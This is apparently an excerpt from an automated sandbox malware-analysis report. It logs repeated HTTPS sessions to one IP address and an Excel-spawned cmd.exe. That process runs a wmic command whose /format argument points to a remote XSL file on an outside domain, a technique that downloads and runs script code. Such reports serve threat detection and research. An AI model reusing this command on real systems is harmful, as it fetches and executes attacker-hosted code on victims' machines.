Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 272, size_out = 272 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1248, size_out = 1248 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #9
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #10
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #11
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #12
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #13
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #14
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #15
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #16
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #17
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #18
»
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Process #8: cmd.exe
48 0
»
Information Value
ID #8
File Name c:\windows\system32\cmd.exe
Command Line CMD.EXE /C wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:01:50, Reason: Child Process
Unmonitor End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration 00:08:50
OS Process Information
»
Information Value
PID 0xcd4
Parent PID 0xed8 (c:\program files\microsoft office\office16\excel.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x CE8
0x BD4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000183c600000 0x183c600000 0x183c7fffff Private Memory Readable, Writable True False False -
private_0x000000183c800000 0x183c800000 0x183c8fffff Private Memory Readable, Writable True False False -
private_0x000000183c900000 0x183c900000 0x183c9fffff Private Memory Readable, Writable True False False -
private_0x0000018a09850000 0x18a09850000 0x18a0986ffff Private Memory Readable, Writable True False False -
pagefile_0x0000018a09850000 0x18a09850000 0x18a0985ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000018a09860000 0x18a09860000 0x18a09866fff Private Memory Readable, Writable True False False -
pagefile_0x0000018a09870000 0x18a09870000 0x18a09884fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000018a09890000 0x18a09890000 0x18a09893fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000018a098a0000 0x18a098a0000 0x18a098a0fff Pagefile Backed Memory Readable True False False -
private_0x0000018a098b0000 0x18a098b0000 0x18a098b1fff Private Memory Readable, Writable True False False -
locale.nls 0x18a098c0000 0x18a0997dfff Memory Mapped File Readable False False False -
private_0x0000018a09980000 0x18a09980000 0x18a09a7ffff Private Memory Readable, Writable True False False -
private_0x0000018a09a80000 0x18a09a80000 0x18a09a86fff Private Memory Readable, Writable True False False -
private_0x0000018a09bf0000 0x18a09bf0000 0x18a09bfffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x18a09c00000 0x18a09f36fff Memory Mapped File Readable False False False -
pagefile_0x00007df5ff480000 0x7df5ff480000 0x7ff5ff47ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff648010000 0x7ff648010000 0x7ff64810ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff648110000 0x7ff648110000 0x7ff648132fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x7ff649110000 0x7ff649169fff Memory Mapped File Readable, Writable, Executable True False False -
kernelbase.dll 0x7ffc14550000 0x7ffc14737fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffc164b0000 0x7ffc1654cfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffc17120000 0x7ffc171ccfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
Host Behavior
File (7)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\Nd9E1FYi\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\Wbem\WMIC.exe os_pid = 0x434, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff649110000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ffc17120000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\SYSTEM32\CMD.EXE, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ffc17143270 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ffc17148940 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ffc17147460 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ffc145a6e50 True 1
Fn
Environment (15)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\Nd9E1FYi\Desktop True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #10: wmic.exe
891 258
»
Information Value
ID #10
File Name c:\windows\system32\wbem\wmic.exe
Command Line wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:01:50, Reason: Child Process
Unmonitor End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration 00:08:50
OS Process Information
»
Information Value
PID 0x434
Parent PID 0xcd4 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 6BC
0x 740
0x B84
0x BC8
0x 47C
0x A7C
0x B40
0x EBC
0x 888
0x 480
0x 454
0x BD0
0x 90C
0x 2FC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
msvcr80.dll 0x5cfe0000 0x5d0a8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000d7edd10000 0xd7edd10000 0xd7edd8ffff Private Memory Readable, Writable True False False -
private_0x000000d7ede00000 0xd7ede00000 0xd7edffffff Private Memory Readable, Writable True False False -
private_0x000000d7ee000000 0xd7ee000000 0xd7ee07ffff Private Memory Readable, Writable True False False -
private_0x000000d7ee080000 0xd7ee080000 0xd7ee0fffff Private Memory Readable, Writable True False False -
private_0x000000d7ee100000 0xd7ee100000 0xd7ee17ffff Private Memory Readable, Writable True False False -
private_0x000000d7ee180000 0xd7ee180000 0xd7ee1fffff Private Memory Readable, Writable True False False -
private_0x000000d7ee200000 0xd7ee200000 0xd7ee27ffff Private Memory Readable, Writable True False False -
private_0x000000d7ee280000 0xd7ee280000 0xd7ee2fffff Private Memory Readable, Writable True False False -
private_0x000002ad20490000 0x2ad20490000 0x2ad204affff Private Memory Readable, Writable True False False -
pagefile_0x000002ad20490000 0x2ad20490000 0x2ad2049ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002ad204a0000 0x2ad204a0000 0x2ad204a6fff Private Memory Readable, Writable True False False -
pagefile_0x000002ad204b0000 0x2ad204b0000 0x2ad204c4fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad204d0000 0x2ad204d0000 0x2ad204d3fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad204e0000 0x2ad204e0000 0x2ad204e0fff Pagefile Backed Memory Readable True False False -
private_0x000002ad204f0000 0x2ad204f0000 0x2ad204f1fff Private Memory Readable, Writable True False False -
locale.nls 0x2ad20500000 0x2ad205bdfff Memory Mapped File Readable False False False -
private_0x000002ad205c0000 0x2ad205c0000 0x2ad205c6fff Private Memory Readable, Writable True False False -
private_0x000002ad205d0000 0x2ad205d0000 0x2ad206cffff Private Memory Readable, Writable True False False -
rpcss.dll 0x2ad206d0000 0x2ad207acfff Memory Mapped File Readable False False False -
pagefile_0x000002ad206d0000 0x2ad206d0000 0x2ad206d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad206e0000 0x2ad206e0000 0x2ad206e0fff Pagefile Backed Memory Readable True False False -
ole32.dll 0x2ad206f0000 0x2ad20832fff Memory Mapped File Readable False False False -
private_0x000002ad206f0000 0x2ad206f0000 0x2ad207bffff Private Memory Readable, Writable True False False -
private_0x000002ad206f0000 0x2ad206f0000 0x2ad2073ffff Private Memory Readable, Writable True False False -
pagefile_0x000002ad206f0000 0x2ad206f0000 0x2ad206f1fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad20700000 0x2ad20700000 0x2ad20700fff Pagefile Backed Memory Readable, Writable True False False -
msxml3r.dll 0x2ad20710000 0x2ad20710fff Memory Mapped File Readable False False False -
wmic.exe.mui 0x2ad20720000 0x2ad2072ffff Memory Mapped File Readable False False False -
private_0x000002ad20730000 0x2ad20730000 0x2ad2073ffff Private Memory Readable, Writable True False False -
private_0x000002ad20740000 0x2ad20740000 0x2ad2079ffff Private Memory Readable, Writable True False False -
private_0x000002ad20740000 0x2ad20740000 0x2ad2075ffff Private Memory - True False False -
private_0x000002ad20760000 0x2ad20760000 0x2ad20760fff Private Memory Readable, Writable True False False -
private_0x000002ad20770000 0x2ad20770000 0x2ad20770fff Private Memory Readable, Writable True False False -
pagefile_0x000002ad20780000 0x2ad20780000 0x2ad20780fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad20780000 0x2ad20780000 0x2ad20783fff Pagefile Backed Memory Readable True False False -
private_0x000002ad20790000 0x2ad20790000 0x2ad2079ffff Private Memory Readable, Writable True False False -
private_0x000002ad207a0000 0x2ad207a0000 0x2ad207a0fff Private Memory Readable, Writable True False False -
private_0x000002ad207b0000 0x2ad207b0000 0x2ad207bffff Private Memory Readable, Writable True False False -
private_0x000002ad207c0000 0x2ad207c0000 0x2ad2084ffff Private Memory Readable, Writable True False False -
private_0x000002ad207c0000 0x2ad207c0000 0x2ad2083ffff Private Memory Readable, Writable True False False -
imm32.dll 0x2ad207c0000 0x2ad207f8fff Memory Mapped File Readable False False False -
private_0x000002ad207c0000 0x2ad207c0000 0x2ad207effff Private Memory Readable, Writable True False False -
private_0x000002ad207c0000 0x2ad207c0000 0x2ad207c0fff Private Memory Readable, Writable True False False -
pagefile_0x000002ad207d0000 0x2ad207d0000 0x2ad207d0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002ad207e0000 0x2ad207e0000 0x2ad207effff Private Memory Readable, Writable True False False -
pagefile_0x000002ad207f0000 0x2ad207f0000 0x2ad2080ffff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x2ad207f0000 0x2ad207f0fff Memory Mapped File Readable, Writable True False False -
pagefile_0x000002ad20800000 0x2ad20800000 0x2ad20800fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002ad20810000 0x2ad20810000 0x2ad2081ffff Pagefile Backed Memory Readable True False False -
private_0x000002ad20820000 0x2ad20820000 0x2ad20821fff Private Memory Readable, Writable True False False -
private_0x000002ad20820000 0x2ad20820000 0x2ad20826fff Private Memory Readable, Writable True False False -
private_0x000002ad20830000 0x2ad20830000 0x2ad2083ffff Private Memory Readable, Writable True False False -
private_0x000002ad20840000 0x2ad20840000 0x2ad2084ffff Private Memory Readable, Writable True False False -
pagefile_0x000002ad20850000 0x2ad20850000 0x2ad20850fff Pagefile Backed Memory Readable True False False -
private_0x000002ad20870000 0x2ad20870000 0x2ad2087ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x2ad20880000 0x2ad20bb6fff Memory Mapped File Readable False False False -
private_0x000002ad20bc0000 0x2ad20bc0000 0x2ad20d7ffff Private Memory Readable, Writable True False False -
private_0x000002ad20bc0000 0x2ad20bc0000 0x2ad20cdffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x2ad20bc0000 0x2ad20c9ffff Memory Mapped File Readable False False False -
private_0x000002ad20cd0000 0x2ad20cd0000 0x2ad20cdffff Private Memory Readable, Writable True False False -
private_0x000002ad20d70000 0x2ad20d70000 0x2ad20d7ffff Private Memory Readable, Writable True False False -
private_0x000002ad20d80000 0x2ad20d80000 0x2ad2117ffff Private Memory Readable, Writable True False False -
pagefile_0x000002ad21180000 0x2ad21180000 0x2ad21307fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad21310000 0x2ad21310000 0x2ad21490fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad214a0000 0x2ad214a0000 0x2ad2289ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad228a0000 0x2ad228a0000 0x2ad2295bfff Pagefile Backed Memory Readable True False False -
rpcss.dll 0x2ad22960000 0x2ad22a3cfff Memory Mapped File Readable False False False -
private_0x000002ad22960000 0x2ad22960000 0x2ad22a5ffff Private Memory Readable, Writable True False False -
private_0x000002ad22a60000 0x2ad22a60000 0x2ad22b5ffff Private Memory Readable, Writable True False False -
private_0x000002ad22b60000 0x2ad22b60000 0x2ad22c5ffff Private Memory Readable, Writable True False False -
private_0x000002ad22c60000 0x2ad22c60000 0x2ad22d5ffff Private Memory Readable, Writable True False False -
pagefile_0x000002ad22d60000 0x2ad22d60000 0x2ad2315afff Pagefile Backed Memory Readable True False False -
private_0x000002ad23230000 0x2ad23230000 0x2ad2323ffff Private Memory Readable, Writable, Executable True False False -
private_0x000002ad23250000 0x2ad23250000 0x2ad2325ffff Private Memory Readable, Writable True False False -
pagefile_0x00007df5ffb60000 0x7df5ffb60000 0x7ff5ffb5ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff66e290000 0x7ff66e290000 0x7ff66e38ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff66e390000 0x7ff66e390000 0x7ff66e3b2fff Pagefile Backed Memory Readable True False False -
wmic.exe 0x7ff66e670000 0x7ff66e6f1fff Memory Mapped File Readable, Writable, Executable True False False -
jscript.dll 0x7ffbf6140000 0x7ffbf6207fff Memory Mapped File Readable, Writable, Executable True False False -
